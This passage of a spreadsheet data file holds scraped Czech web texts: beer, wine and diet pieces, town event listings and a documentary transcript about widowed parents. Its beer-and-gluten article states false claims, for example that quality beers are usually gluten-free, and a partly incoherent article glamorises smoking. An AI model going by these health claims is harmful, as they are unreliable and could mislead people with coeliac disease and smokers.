    <t>Pivo a Lepek: Co by Měl Každý Pivní Fanoušek Vědět</t>
  </si>
  <si>
    <t>Pivo a Lepek: Co by Měl Každý Pivní Fanoušek Vědět Tvaroh a Povidla.cz 1. 10. 2024 Vítejte, milovníci piva ! Pokud jste připraveni rozšířit své znalosti o pivu a lepku, pak jste na správném místě. V tomto článku se dozvíte vše, co by měl každý pivní fanoušek vědět o spojení piv a lepku. Připravte se na fascinující a informativní čtení, které vám změní pohled na vaše oblíbené pivo ! Obsah článku Nenechte si ujít: Jak poznat Kvalitní Pivo od Napodobeniny Víte, co je důležité znát, pokud jste vášnivým příznivcem piva a současně se zajímáte o lepek? Chutnat kvalitní pivo od napodobeniny není vždy snadné, ale existuje několik klíčových faktorů, které vám pomohou rozlišit skutečné pivo od kopie. Zde je pár tipů, které by měl každý pivní fanoušek vědět: Obsah lepku: Pokud má pivo více než 20 ppm lepku, může to znamenat, že se jedná o napodobeninu. Kvalitní piva mají obvykle velmi nízký obsah lepku nebo jsou zcela bezlepková. Chuť a vůně: Skvělé pivo se vyznačuje intenzivní chutí a jedinečnou vůní, které nelze napodobit levnou replikou. Vychutnejte si každé pivo a zkuste rozpoznat jeho jedinečné aroma. Producent: Důležité je také sledovat, kdo pivo vyrábí. Renomované pivovary s dlouholetou tradicí obvykle dodržují vysoké standardy a kvalitu svých výrobků. Nejlepší Způsoby Jak Správně Servírovat Pivo Nejlepší způsoby, jak správně servírovat pivo , jsou základem pro každého skutečného pivního fanouška. Není nic horšího než vidět, jak se vaše oblíbené pivo podává chybně a ztrácí tak svou chuť a kvalitu. Jak tedy správně servírovat pivo ? Zde je několik tipů, které by měl znát každý, kdo má rád tento lahodný nápoj: Volba sklenice: Správná sklenice může udělat zázraky pro chuť piva . Každý druh piva by měl být podáván ve specifické sklenici, která pomáhá udržet aroma a pěnu. Teplota: Pivo by mělo být podáváno při správné teplotě. Studené pivo může potlačit jeho chuť, zatímco příliš teplé pivo nemusí být příjemné k pití. Přelití: Při nalévání piva do sklenice je důležité zajistit správnou hlavu pěny. Přelitím piva se uvolní oxid uhličitý a zdůrazní se tak jeho chuť a vůně. Vždycky si dejte záležet na tom, jak správně servírujete pivo , abyste si mohli skutečně vychutnat jeho plnou chuť a aroma. A pamatujte, každý dobrý pivní fanoušek ví, že v každém pivním zážitku hraje důležitou roli samotné servírování piva . Historie a Vývoj Piva a Lepeku V historii lidstva hraje pivo důležitou roli. Jeho vývoj a výroba jsou spojeny s mnoha zajímavými událostmi a objevy. Pokud jste vášnivým pivním fanouškem, je dobré znát některé základní fakta o historii a vývoji piva a lepku. Věděli jste, že pivo bylo pravděpodobně prvním alkoholickým nápojem, který lidé začali vyrábět? Jeho historie sahá až do dávnověku a pivařství se postupně vyvíjelo a zdokonalovalo. Začalo se používat jako platidlo, lék a dokonce i náboženská obřadnost. Středověké kláštery – významnou roli ve vývoji piva hrály středověké kláštery, které pivo vařily pro své obyvatele i cestující. Klášterní piva byla známá svou kvalitou a chuťovými vlastnostmi. Průmyslová revoluce – s nástupem průmyslové revoluce se začaly rozvíjet moderní pivovary, které umožnily masovou výrobu piva . Tento technologický pokrok měl zásadní vliv na dostupnost piva a jeho popularitu. Nejoblíbenější Místa k Návštěvě pro Milovníky Piva Vítejte ve světě piva ! Pro milovníky piva je cestování nejen zážitkem, ale také dobrodružstvím plným nových chutí a vůní. Pokud jste fanouškem piva a rádi byste objevili nejoblíbenější místa k návštěvě, jste na správném místě. Zde najdete tipy a rady, které by měl znát každý pivní fanoušek. První věcí, na kterou byste měli myslet, je lepek. Pokud trpíte na celiakii nebo máte nesnášenlivost na lepek, měli byste být opatrní při výběru piva . Existuje však stále více pivovarů, které vyrábějí pivo bezlepkové nebo s nízkým obsahem lepku. Nezapomeňte se před návštěvou informovat o nabídce piva bez lepku v daném pivovaru. Pivovar Bezlepkový pale ale Jak Si Vytvořit Vlastní Pivní Degustaci Když se chystáte uspořádat vlastní pivní degustaci, je důležité mít na paměti nejen různé druhy piva , ale také potenciální alergeny, jako je lepek. Každý pivní fanoušek by měl vědět, že pivo může obsahovat obiloviny obsahující lepek, jako je ječmen, pšenice nebo žito. Pokud plánujete degustaci pro skupinu lidí, je důležité zjistit, zda mezi nimi není někdo s celiakií nebo nesnášenlivostí na lepek. Pro vytvoření úspěšné pivní degustace je důležité dodržovat několik základních pravidel, jako je správné pořadí ochutnávání piva , volba správných sklenic nebo čištění chutí mezi jednotlivými druhy piva . Nezapomeňte také na správné znění při popisu piva , vysvětlení historie pivovaru nebo způsobu vaření. Vaše hosty určitě ocení vaši snahu o vytvoření autentické a zajímavé pivní degustace. Klíčové Poznatky Pivo a lepek jsou neoddělitelně spjaty s pivní kulturou a pro mnoho pivních fanoušků představují nezbytnou součást jejich života. Je důležité si uvědomit vliv lepku na naše zdraví a vybírat piva s rozvahou. S dostatkem informací a vědomostí můžeme užívat chutné pivo naplno, aniž bychom si škodili. Ať už jste pivním fanouškem nebo jen občasným pijákem, je důležité si všímat svého těla a naslouchat jeho potřebám. Doufám, že tento článek vám přinesl užitečné informace a podnětil vás k zamyšlení nad tím, co vlastně pijete. Prostřednictvím vědomého výběru piv můžeme udržovat zdravý životní styl a zároveň si užívat výjimečné chutě a aromata, které svět piva nabízí. Takže si dejte skleničku oblíbeného piva a připijme na zdraví! Cheers! Nenechte si ujít: Rubrika transition_slide Celiakie</t>
  </si>
  <si>
    <t>1230</t>
  </si>
  <si>
    <t>15000</t>
  </si>
  <si>
    <t>20241001_3_2998181676_e691f40e619d4de931f7.html</t>
  </si>
  <si>
    <t>e691f40e619d4de931f7</t>
  </si>
  <si>
    <t>Cigára jako módní doplněk: Jak se z kouření stalo umění</t>
  </si>
  <si>
    <t>Cigára jako módní doplněk: Jak se z kouření stalo umění autor: Redakce Nezdrave.cz | 01.10.2024 | Cigára V poslední době si mnozí lidé spojují cigarety s něčím víc než jen s obyčejným fetováním nikotinu. Staly se z nich jakési módní ikony, na které nedají dopustit nejen zarytí kuřáci, ale i ti, kdo se chtějí ukázat jako neodolatelné osobnosti s dávkou rebelství. Dnes se podíváme na to, jak se cigára proměnila v symbol stylu a jaké překvapivé trendy s nimi souvisejí. Kouření s elegancí Cigára už dávno neznamenají pouze škodlivou závislost, ale také určité vyjádření osobnosti. V dnešní přetechnizované době, kde se zdá, že každý dělá totéž jako jeho soused – ať už je to ve světě startupů, módy nebo gastronomie – je kouření jako umění, které vyžaduje nejen dovednost, ale i znalosti. Pořádat “cigárové večírky”, na kterých se kuřáci scházejí, aby probírali nejen techniky přípravy, ale i estetiku kouření, je něco, co by se dalo nazvat novým vítězstvím sobectví. Kdo by odolal tomu vychutnávajícímu gestu, kdy si po dlouhém dní rozvalí nohy na gauči, zapálí cigaretu a s pohledem vzdorujícím světu si užívá okamžik? Jenom si představte – víte, že zlaté období cigaret – to byla doba, kdy si lidé nemuseli brát na obdiv obrázky kašlajících plic na krabičkách, nebo se předhánět v tom, kdo je “cool” a přitom nepyří pneu. Naši předci si prostě užívali své tabloidy se stylovými a elegantními postavami, upíjeli drink a cizelovali svá umění debatování a kouření do perfektní podoby. Soulmate vašeho ego se zachumlaným doutníkem, koktejl s bohatou pěnou a úsměvem na tváři. Je na čase, abychom obnovili tuto tradici a vrátili kouření zpět do módy, avšak s náležitou dávkou vědomí a vkusu. Cigárková revoluce Myslíme si, že v okamžiku, kdy někdo vyndá z kapsy kloubko, zaujme uši všech v místnosti, ale teď si představte buriante, který se vedle vás povaluje s doutníkem. Jestli tohle nestmeluje partu, co ještě? Mnoho yuppies a boomerů se v posledních letech začíná vracet k evergreenu – k pošetilosti kouření doutníků. Ano, je to šokující, ale existují lidé, kteří si začínají uvědomovat, že pečlivě zakouřený doutník je přesně to, co po náročném dni potřebují. A co víc, tato praxe posouvá samotné kouření do sféry, kde se stává terčem obdivu, nikoli pohoršení. Takže, pokud se chcete cítit jako starý dobrý fajnšmekr, zamiřte do specializované prodejny a vyzkoušejte si vybrat ten správný doutník, který vás dostane do výšin. První cigára pomalu, ale jistě mizí z našich paměti, nahrazují je kousky, které v sobě mají mnohem víc. Nyní už nejde jen o nutkání, ale o umění – o umění spojit si zážitek s chutěmi a vůněmi, které máte rádi. Proto nezapomeňte, že i připravené drinky a dobrá atmosféra umějí udělat divy! Final Touch : Co cigára říkají o nás Konečně, na cigára není nic špatného, pokud se k nim přistupuje s respektem a mírou. Stejně jako u každého dobrého vína , i u kuřáků platí, že pití by mělo být spíš radostí než nutností. V našem hektickém světě, kde se ukazuje, že chvíle odpočinku bývají vzácné, se cigára mohou stát oblíbeným společníkem. Jedině tak můžeme zažít tu správnou atmosféru a ponořit se do momentů, které nám život nabízí. Tak na zdraví, ať už si vybíráte cigárko náhodně nebo s elegancí mistra! Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241001_30_2997331746_8a4e2ea68434863cbfae.html</t>
  </si>
  <si>
    <t>8a4e2ea68434863cbfae</t>
  </si>
  <si>
    <t>Jakou cenu má dětský život? Pro některé rodiče zřejmě jen šest piv! | Praha na Dlani Aktuálně</t>
  </si>
  <si>
    <t>Jakou cenu má dětský život? Pro některé rodiče zřejmě jen šest piv ! | Praha na Dlani Aktuálně K neobvyklému případu došlo na americké Floridě . Mladý pár rodičů se tam pokusil prodat svého terpve dvouměsíčního syna. Dokonce se jim i podařilo najít kupce , se kterým začali uzavírat zvrácenou smlouvu!... Celý článek naleznete na: www.blesk.cz/... Autor: Blesk.cz</t>
  </si>
  <si>
    <t>1420</t>
  </si>
  <si>
    <t>1220</t>
  </si>
  <si>
    <t>20241001_31_2997331689_1bde6d7eeb03d95a612c.html</t>
  </si>
  <si>
    <t>1bde6d7eeb03d95a612c</t>
  </si>
  <si>
    <t>Víno Rulandské bílé 2020, pozdní sběr, Jindřich Kadrnka</t>
  </si>
  <si>
    <t>Víno Rulandské bílé 2020, pozdní sběr, Jindřich Kadrnka „Zralé víno . 269,- Jeden z Kadrnkových výletů do mého oblíbeného Pavlova. Víno je pro mne ale opravdu oříšek. Barva světlejší žlutozelená. Vůně letmá, sadová. V chuti ten úplně první vjem je nezralé ovoce. Kyselinka je silná a nevyzrálá, zase jednou víno sklizené před fenologickou zralostí, aby byly zachovány odrůdové charakteristiky... Po opravdu velkorysém ohřátí a vydýchání se odhalují komplexnější tóny sadového ovoce a květů, najednou se tu ukazuje mnohovrstevnaté víno s chlebovinkou rulandy, ovocitostí Pavlova a navinulou kyselinkou a mineralitou v doznívání. Ale je to boj se k tomu propít, je to hodně nesnadné víno a na první dobrou bych ho snad raději vylil...“ (0) „ Víno zlatožluté barvy a výborné viskozity. Ve vůni plné ovoce - ananas, citrusy, grep. V chuti lehce slaná mineralita s hruškovou dochutí. Pěkné.“ Podrobné rozložení bodů 1. 12. 2022 „Jiskrná zlatožlutá barva, výborná viskozita. Plné koncentrované aroma s paletou tónu žlutého sadového ovoce, grapefruitu, ananasu, hrušek máslovek a zralých citrusů. Chuťově naprosto v perfektní kondici, dominance minerální salinity, perfektně integrovaná kyselina, decentní ovocná textura zralého sadového ovoce a dlouhá výrazná dochuť. Tak jako předchozí ročník 2019 se povedl i tento aktuální. Výborná zralá surovina a skvělá práce sklepmistra.“ (0) /100 1. 8. 2022 „Vůně chlebovinky, medu, kandovaných rynglí a citrusových plodů. Tělo mohutné a kyselinka pěkně nakopávací. Med, citron, nedozrálé ryngle, v dochuti minerálně slané a lehce vystupuje alkohol . Působí dost suchým dojmem a dochuť kratší.“ (0) /100 31. 5. 2022 „Hrozny z Pavlova , trať U božích muk. Ve vůni chlebovinka bananový krém, kandovana citronová kůra, med. Chuť středně plná lepší než vůně šťavnatá minerální“ (0) /100 17. 8. 2021 Výborné víno : Špičkově provedené odrůdové víno . Čisté s delší dochutí. Často nejlepší v poměru kvality a ceny. (0) Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241001_32_2997331784_07df912dbc101fa539d9.html</t>
  </si>
  <si>
    <t>07df912dbc101fa539d9</t>
  </si>
  <si>
    <t>Žádné zákazy, doporučená sklenka vína a hodně ryb. Nová dieta tvrdí, že zná recept na ochranu mozku i paměti</t>
  </si>
  <si>
    <t>Žádné zákazy, doporučená sklenka vína a hodně ryb. Nová dieta tvrdí, že zná recept na ochranu mozku i paměti Internet a sociální sítě jsou plné nových diet, které mají zajistit rychlý úbytek kil nebo zdravější život. Posledním velkým hitem po přerušovaném půstu a keto dietách byla dieta DASH, která byla speciálně vyvinutá ke snížení krevního tlaku. Skupina...</t>
  </si>
  <si>
    <t>727</t>
  </si>
  <si>
    <t>75</t>
  </si>
  <si>
    <t>20241001_33_2998178108_6919a5a54c91d1d6e4ca.html</t>
  </si>
  <si>
    <t>6919a5a54c91d1d6e4ca</t>
  </si>
  <si>
    <t>Smržovské kulturní a zábavné akce v říjnu</t>
  </si>
  <si>
    <t>Smržovské kulturní a zábavné akce v říjnu 01.10.2024 21:05:18 | Autor: Paulina Havlasová | Rubrika: Kultura | Obce: Smržovka Přinášíme vám přehled akcí kulturního střediska a dalších organizací a spolků ve Smržovce a okolí v říjnu 2024. 130 let smržovského viaduktu Komponovaná výstava ve výstavní síni Zámečku. Město Smržovka a Muzeum místní historie Smržovka vás srdečně zvou na výstavu, která je uspořádána pro připomenutí historie nejenom stavby viaduktu, ale i smržovského úseku železniční trati z Liberce do Tanvaldu . Pro návštěvníky jsou připraveny fotografie, zajímavé informace, nový model viaduktu s projíždějícím vláčkem, historické drážní předměty, ale i návrhy loga oslav 130. narozenin viaduktu. Výstavu můžete zhlédnout během týdne od 8 hodin, v pondělí a středu do 16 hodin, v úterý a čtvrtek do 15 hodin, v pátek do 11.30 hodin (polední přestávka: po-pá 11.30-12.30 hodin) - před plánovanou návštěvou vám doporučujeme si telefonicky ověřit, zda jsme přítomny (tel.: 483 369 325, 727 806 195), o víkendu pouze v sobotu od 13 do 16 hodin (s výjimkou soboty 19. října, kdy bude přístupná od 10 do 18 hodin). Hospodský kvíz Od 18 hodin v Parkhotelu. 56 otázek, soutěžení, výhry a především zábava. Chcete zažít víc než jen běžný pokec u piva ? Hospodský kvíz nabízí všem skvělý zážitek na večer. Bude k tomu stačit tužka, papír a chuť postavit se nové výzvě. Každý týden nové otázky, každý týden odměna pro nejúspěšnější týmy. Co je potřeba udělat? Sestavit tým (1-8 hráčů), vymyslet pro něj originální název a přihlásit jej. Pak se už jen dostavit včas a nechat se provést večerem moderátorem. Startovné za jednoho hráče je 100 Kč. Registrace týmů na https://hospodskykviz.cz/hospody/parkhotel-smrzovka/rezervace, kde získáte i všechny ostatní informace. Hospodský kvíz Od 18 hodin v Parkhotelu. Dýňobraní Od 15 do 16.30 hodin za budovou ZŠ v Komenského ulici č. p. 964. Co vás čeká? Můžete si koupit dýni přímo na místě (cena dle velikosti), nebo si přinést svou a společně se svými rodiči si ji vydlabat a ozdobit (s sebou nůž a lžíci). Ozdobit si vlastní přinesenou zavařovací sklenici a udělat si z ní dýňové světýlko. Vyrobit si drobné podzimní dekorace. Za příznivého počasí bude v okolí školy dýňová stezka. Možnost zakoupit si párek v rohlíku. Dýňobraní pořádá, srdečně zve a na setkání se těší Základní škola Smržovka. Svatohubertská mše Od 17 hodin v kostele sv. Archanděla Michaela. Pro všechny zájemce a příznivce je od 15 hodin připravena zvěřinová kuchyně v Myslivecké chalupě v ulici Rašelinová, na které si můžete pochutnat i po skončení mše (otevřeno bude do vyprodání zásob). Oslavy smržovského viaduktu Od 10 do 18 hodin u hlavního vlakového nádraží a v Zámečku. Hlavní vlakové nádraží, viadukt a náměstí T. G. Masaryka . • 10-10.20 hodin: Zahájení oslav vystoupením dětského pěveckého sboru Smržováček • 10.20-14 hodin: K poslechu, dobré náladě i tanci zahraje O.V.J. Dixie Liberec • 12 hodin: Přípitek pod oblouky viaduktu a otevření upravené cesty mezi ulicemi Jitřní a Údolní • 12.30 hodin: Slavnostní odhalení busty Tomáše Garrigua Masaryka na náměstí T. G. Masaryka • 14-14.30 hodin: Vystoupení tanečního kroužku ZŠ Smržovka • 14.30-18 hodin: Hudbu od country až po rock zahraje skupina Kompress Rock s frontmanem Pavlem Černým Dále: Jízdy historických parních vlaků, tvořivá dílnička s Květou Merklovou, stezka s QR kódy - deset zastavení o Smržovce (pořádá ZŠ Smržovka ), airbrush (dočasné tetování) s železniční a smržovskou tematikou, občerstvení, stánky nejenom se zbožím s železniční tematikou, prodej nové výroční turistické vizitky (vč. razítka) a dalších předmětů s motivem viaduktu. Zámeček 10-18 hodin • Výstavní síň - výstava s názvem 130 let smržovského viaduktu, která připomene historii nejenom stavby viaduktu, ale i smržovského úseku železniční trati z Liberce do Tanvaldu, stejně jako všechny návrhy loga letošních oslav. • Muzeum místní historie s novým modelem viaduktu s projíždějícím vláčkem • Přízemí - prodej vlastní poštovní známky s motivem viaduktu, a to včetně možnosti získání příležitostného razítka s motivem oslav (https://www.smrzovka.cz/vismo/kalendar-akci.asp?hledani=1&amp;amp;id_org=15132&amp;amp;kdy=-1&amp;amp;datum_od=19.10.2024&amp;amp;datum_do=19.10.2024&amp;amp;p1=7928) • Venkovní galerie (plot k nádraží) u Zámečku - práce žáků Základní školy Smržovka na téma viadukt Dušičkové rozjímání Vzpomínka na ty, kteří nás opustili v kapličce Panny Marie Smržovské. Malé Polsko zve na procházku křížovou cestou ke kapličce Panny Marie Smržovské, která bude v tento den otevřena a kde budete moci zapálit svíčky a zavzpomínat na své blízké, kteří vás již opustili. Cesta bude osvětlena svíčkami. Hospodský kvíz Od 18 hodin v Parkhotelu. Vzpomínka na zemřelé se zamyšlením a modlitbou Od 16 hodin na smržovském hřbitovu. Setkání s páterem Pavlem Ajchlerem, při kterém se na chvilku ztišíme, zavzpomínáme a za všechny zemřelé se společně pomodlíme. V duchu se vrátíme ke všem těm, kteří s námi žili, radovali se, pomáhali nám, navštěvovali nás a my jsme se těšili z jejich přítomnosti. Pak odešli tam, odkud není návratu. Zbyly nám jenom vzpomínky, a nyní chodíme na hřbitovy my za nimi. Následovat bude od 17 hodin v kostele sv. Archanděla Michaela mše sv. za zemřelé. Dušičky Od 18 hodin v kostele sv. Archanděla Michaela autorské představení - melodrama (hudba, zpěv a mluvené slovo) vytvořené s úctou ke svátku Památka zesnulých v podání Základní umělecké školy Tanvald . Hudbu zkomponoval Petr Tomeš, texty napsaly Marika Tringelová a Martina Křížová. Mluveného slova se ujme Zdeněk Rakušan . Sólové party nastudovaly Adriana Šimková a paní učitelka Zuzana Schořovská, pod jejímž vedením vystoupí i sbor Melodia . Doprovází vyučující a hosté Základní umělecké školy Tanvald . Vstupné dobrovolné. Veřejná sbírka na rekonstrukci kostela pokračuje, budeme proto vděční za každý obnos, který pošlete na účet 268250895/0300 nebo odevzdáte do pokladny v kostele a ujišťujeme vás, že veškeré prostředky budou použity výhradně na rekonstrukci našeho kostela. Akci pořádají: Spolek Michael Smržovka ve spolupráci s městem Smržovka a římskokatolickou farností Smržovka. Více na: www.kostel-smrzovka.webnode.cz. 15. 11. - Ples města Smržovky Předprodej vstupenek bude zahájen na Zámečku 30. 10. 2024. 23. 11. - Vánoční výtvarná dílna Více informací www.smrzovka.cz nebo 483 369 325. Sdílet s přáteli na facebooku Výstava 130 let viaduktu | Oslava 130 let viaduktu | Dýňobraní Autor: Paulina Havlasová Autor person Paulina Havlasová Rubrika transition_slide Ostatní</t>
  </si>
  <si>
    <t>1590</t>
  </si>
  <si>
    <t>1380</t>
  </si>
  <si>
    <t>20241001_34_2997407507_04782ec51f985b0989c6.html</t>
  </si>
  <si>
    <t>04782ec51f985b0989c6</t>
  </si>
  <si>
    <t>Spojila nás smrt</t>
  </si>
  <si>
    <t>Spojila nás smrt V Česku žije početná skupina ovdovělých rodičů v produktivním věku s dětmi. Mnohdy propadají sítem pomoci. Přitom čelí velké zátěži - socioekonomické, psychické, s výrazným dopadem na děti. Dokumentární film sleduje životy tří vdov a jednoho vdovce, které spojuje péče Nadačního fondu Vrba. S čím vším se mladé vdovy a vdovci potýkají v běžném životě? Režie: Lea Surovcová -Přátelé a kamarádi, já vás tady vítám. Jsem ráda, že jsme se sešli aspoň v tomto počtu a že nám to dneska pěkně půjde. Já jsem rozhodně chtěla si uchovat nějakou vzpomínku a dát prostor i pro ostatní, aby vzpomínali. Je zajímavý, že první, co jsem říkala, že tohle jako se děje, ale ne mně. Mně prostě ne. Prostě já mám dvě malý děti a tohle ať se děje jinejm. Já vím, že to v tu chvíli bylo jako zlý, ale já jsem říkala: Ať se tohle děje jinejm, ale ne mně. -Stalo se to 5.prosince. A ten den si mi zastavil čas. Naprosto. A všechno se vlastně sesypalo. Všechno se mi sesypalo. Celá moje budoucnost. Moje dítě ztratilo tátu. Já jsem ztratila úplně naprosto skvělýho manžela. Jel do práce a měl autonehodu. -Tohle taky samozřejmě, co se děje tady na silnicích, houkačky a tak dále. Nedělá mi to dobře. Nedělá. Mám to s tím prostě spjatý. Manželka vlastně dostala smyk a auto šlo dvakrát přes střechu a vylítlo to prej navrch, nevím, metr, dva metry nahoru a sklaplo je to. Byla 10 měsíců v kómatu. Takže mě ju pak odvezli do hospicu, do Rajhradu , kde mně prostě umřela. -Táta prořezával topoly a tady tenhle, to je on. Nebyl ten strom zdravej. Všimni si úplně nahoře, jak je ta poslední větev, která je taky nějaká useknutá rovně. Tak z takové výšky on vlastně spadl. -To se prostě nedá popsat. A tím, že to byla ještě jako sebevražda doma na záchodě. A když jsem ho našla ještě já a tady celé to martýrium - policajti a tak, to se prostě nedá popsat. -Celá tahle zkušenost mě přivedla na myšlenku, že bych chtěla pomáhat takovým lidem, jako jsem já. Protože mně chybělo sdílení, chyběly mi praktický informace. Proto jsem i založila Nadační fond Vrba. Když tátovi bylo třicet, tak jsem mu koupila jako dárek let balónem. A nám se podařilo letět hezky úplně nad tím hradem. Viděli jsme ho krásně, že nás to krásně fakt fouklo přesně nad hrad. To jsme měli rádi. -Dobrý den. -Dobrý den. -Petra Cvrkalová, Nadační fond Vrba -Veronika Maxiánová. - Kamila Valoušková. -Veronika Maxiánová. Dobrý den. -Nazdar! Jak se jmenuješ? -Teodor. Řekneš ahoj? -Tak pojďte dál. -Dobře. Děkujeme. -Já jsem nadační fond oslovila tak týden po smrti manžela. Určitě to pomáhá v tom, že člověk zjistí, že v tom není sám. Že je nějaká komunita lidí, která toto vlastně zažívá. -Tak. Paní Maxiánová, toto je Kamila Valoušková, naše vrběnka, která by se starala o Teušku. O Tea. My máme pro tebe dáreček. -Teo, koukej. -Pojď se podívat. Teoušku, dívej, dívej. -Koukni! - Bali . -Bagr, ano. -Teoušku, půjdeš ukázat svůj pokojíček. -Ukážeš mi nějaký hračky, Teo? -Hračky. -Tady je modrý... -Modrý kyblík, ano. -Manuál mám sebou. Potřebovala bych teď zhruba ty dva měsíce po tom, co manžel zemřel, to projít ještě jednou, jestli je to všechno hotové, jestli jsme na něco nezapomněly. Takže bychom to teď společně prošly. Pohřebný, to je řešeno. Příspěvky vyřešeny. -Občanka? -Vyřešena. -Výborně. Důchody? -O ty jsem požádala. Jo. Paráda. No a až se ozve notář, tak tady jsou všechny ty věci, který po tobě bude chtít k dědickému řízení. To projdem prostě. Až dostaneš obsílku, tak to klidně můžeme projít. -No kde je? Je tam? No super. -Ťupí. -Ano. -Neťupí. -Ano. Takhle? Aha. -Do těch 30 let se s tím nepočítá. Ono se nepočítá ani do 40 let, že se člověk stane vdovou, ale prostě někdy, v určitých okamžicích je super mít ten pocit, že člověk není sám. -Náš příběh se odehrává u moře plné ryb. A jak už to bývá, tam, kde jsou ryby, tam jsou také lidé. Krásná je Neapol , krásná, když svítá. Santa Lucia, Santa Lucia. Zlatá rybo, slyš má slova! Vylez z vody, zjev se znova! Šplouch! Giuseppe, kam koukáš? Copak? Ty mě voláš? To víš, rybo, moje paní, ona by chtěla být královnou. Cha, cha, cha, cha! -Všechno máš? -Všechno máš? -A máš plné břicho? -Je velmi těžký těm dětem... Nějak je o tom informovat. Nebo říct jim to. Ale zároveň si myslím, že to je základ jakoby toho vztahu, protože jak to máte vysvětlit pětiletý nebo šestiletý dceři? Nevím, jestli si pamatujete na nějaký otázky v tomhle, který byly pro vás fakt těžký na zodpovězení. -Já si teda pamatuju na hřbitově, když dceři byly asi 4 roky, tak že máme takový menší hrob, tak ona se zeptala: A jak se tam táta vešel? Řekla jsem, že tam není to tělo. Že je tam jenom taková schránka, v který je popel. Ona vůbec tomu nerozuměla v těch 4 letech. A jestli jsem to řekla dobře, to nevím do dneška. Syn to chápal, ten byl větší. Ale v těch 4 letech ona prostě si pořád myslela, že tam leží celý to tělo. Takže zpopelnění jsem taky nezvládla vyloženě jako říct jim to v době tý smrti. To jsem nedokázala. -Po roce před Vánocema se mě zeptal, jestli přijde. Takže znovu všechno vysvětlování. -Někdy slova nemusí být. Stačí vzít a obejmout. A cítíte, jak to dítě to přijímá. Stiskem. Chvilkou obejmutí. Taky dobrá věc. Jdeš? Přestalo nám pršet a jdem na prochajdu. Co? U toho malýho, řekl jsem mu to pohádkou nějakým způsobem. Samozřejmě pak mu to naskočilo a od té doby nechce spát sám. Tam má takovou tu nejistotu prostě. -A jedem! -A jedem a jedem! Já jedu, já jedu! -Vedle. -Taky vedle. -Ne. To byl zásah. -Matýsku, jak se ti líbila včera pohádka? -Dobře. Jo? A co by sis přál od té rybičky? -Mamku. -Jo? Já bych si taky přál mamku. -Málokoho napadne přemýšlet nad něčím takovým. Člověk si žije ten život v té své bublině, a najednou buch, prásk, a všechno pryč. Zároveň... Já třeba ze svýho pohledu, já jsem úplně svoje kamarády nechtěla tím zatěžovat, obtěžovat, protože nechtěla jsem je nějak úplně přivádět do rozpaků, protože je to... Není to lehký téma. -Tak někteří prostě neví, jak se k nám mají chovat. -Bojí se nám tu pomoc nabídnout, protože nevědí, v jak hodně citlivý situaci v tom prvním čase jsme. -Se začnou vyhýbat. Jsou různý stavy. -Někdo ví, jak na nás, někdo ne. -Já mám pocit, že jsme si vytvořili takovou jako druhou rodinu. -Ano. A není to jenom o setkání. My spolu fungujeme, ty kontakty byly navázány a fungujeme spolu i mimo tato setkání. -A je fajn vidět posun ostatních i svůj vlastní. Takže jako je to fajn. -A pak to tam zajiskří a jsou tam i vztahy, kluci, že jo? -No jasně. -Vztahy nebo styky. -Policie. -Přechod pro chodce, přechod pro chodce. -Žena vždycky se snažila hrát hry, abysme trávili společně večery. -Pásky. -Dobře. A brejle. -Smajlík. -Peníze. -Necháš toho. Tak vždycky říkám klukům: Pojďte, zahrajeme si hru. Mamka určitě by byla ráda. Zase jsi mě porazil. Gratulujeme ti. Tak jo. Vyhrál jsi to. Seš dobrej. -Dobrý den. -Dobrý den. -Já jdu podat daňové přiznání za manžela. -Já se dívám, jestli máte kopii. Tohle všechno, co mi tady dáváte, zůstává u nás. -Nebudete chtít z toho něco zpátky. -Ano, ano. -Mám pocit, že plavu úplně ve všem, protože všechny věci řešil manžel. Co se týkalo energií, různých poplatků, prostě toto všecko bylo na manželovi. Takže momentálně se všecko jakoby učím. Učím se to všechno. Na účet partnera se nedostanete, pokud neznáte heslo, což já jsem neznala, a ten účet je do druhého dne zmražený. Takže vlastně ten den, co manžel zemřel, tak já jsem vlastně zůstala s dvouma tisícama na účtě. A vy máte vlastně hypotéku na krku, úvěr na krku. Ale díky tomu, jak skvělou já mám rodinu, tak jsem nezůstala ve finanční tísni. Hodně mi pomohli. -Vlastně tam podáváte za to období od - do úmrtí, to znamená od začátku ledna do toho datumu úmrtí. A pak teprve podáváte, až po ukončení jakoby... -Až po ukončení dědického řízení. -Pak podáváte ten zbytek. -Je to rozdíl v téhle situaci, když je někdo sezdaný a nesezdaný? -Myslím, že v dědictví rozhodně. Je to rozdíl potom v tom dědickým řízení. Protože když vám vlastně dítě, kterýmu není rok ani, zdědí auto, dům, v kterým bydlíte, byt. Ještě v lepších případech firmu třeba s 15 zaměstnancema, tak to je potom jako oříšek pro ty naše právní poradce. -Ale kdyby to dědictví netrvalo třeba přes rok, nebo 2 roky trvá to dědictví a člověku zastaví účty, všechno mu zastaví. -A to si pamatuju, že mně nikdo jako neřekl. -Když to jsou společný peníze, který mají společně manželé, že máme dohromady naspořené peníze, člověk s nima do budoucna počítal, a jsou pasé prostě. -Přesně tak. -Všechno měl vedený manžel na sebe. Na svým účtu. Já jsem měla kartu k účtu akorát. A zablokovali všechno. Já jsem šla do banky a říkám: Potřebuju, abych věděla, kam mám odeslat peníze? Ne, my vám nic neřekneme. Až budete mít vyřešený dědictví. -Přesně. No, přesně. -Já říkám: Do tý doby mě vystěhujou z bytu, vypnou elektriku, všechno. -Vrba už funguje osmým rokem. A poslední rok asi, kdy už jsme uzavřeli kapitolu covidu a nám nastoupala klientela neskutečnou měrou, teď hrozí reálně poprvé za 7 let to, že v prosinci odbydeme Předvánoční setkání pod Vrbou a od ledna si všichni hledáme nový místa. Takže dlouhou dobu tady žádná péče o ovdovělé rodiče s dětmi nebyla. 7 let se snažím někomu vysvětlovat dokola a dokolečka, že prostě je tady ta skupina lidí, potřebují naši nějakou podporu, a toto všechno prostě je úplně marný, protože na MPSV nemají aktuálně nástroje, aby nás finančně podpořili. Tak kdo z toho ministerstva bude pomáhat paní. Dobrý den, nevím jak začít, ale zemřel mi partner, otec mých dětí. Kromě toho, že nevím, co dál se životem, v hlubokém zármutku a s nepomáhajícími antidepresivy, tak se moc neorientuji v tom, co dál s úřady. A takový e-maily dostáváme prostě doopravdy 2-3 týdně. A to ještě neví, že jim poskytneme úplně tu komplexní podporu. A tou přidanou hodnotou, kterou nebude mít nikdo z úřednic na ministerstvu nebo na jejích pobočkách, je, že jsem si tím sama prošla. Já jim nebudu říkat mýty o smrti anebo vůbec o tom prožívání té pozůstalostní doby. -Daleko na severu je grónská zem, žije tam 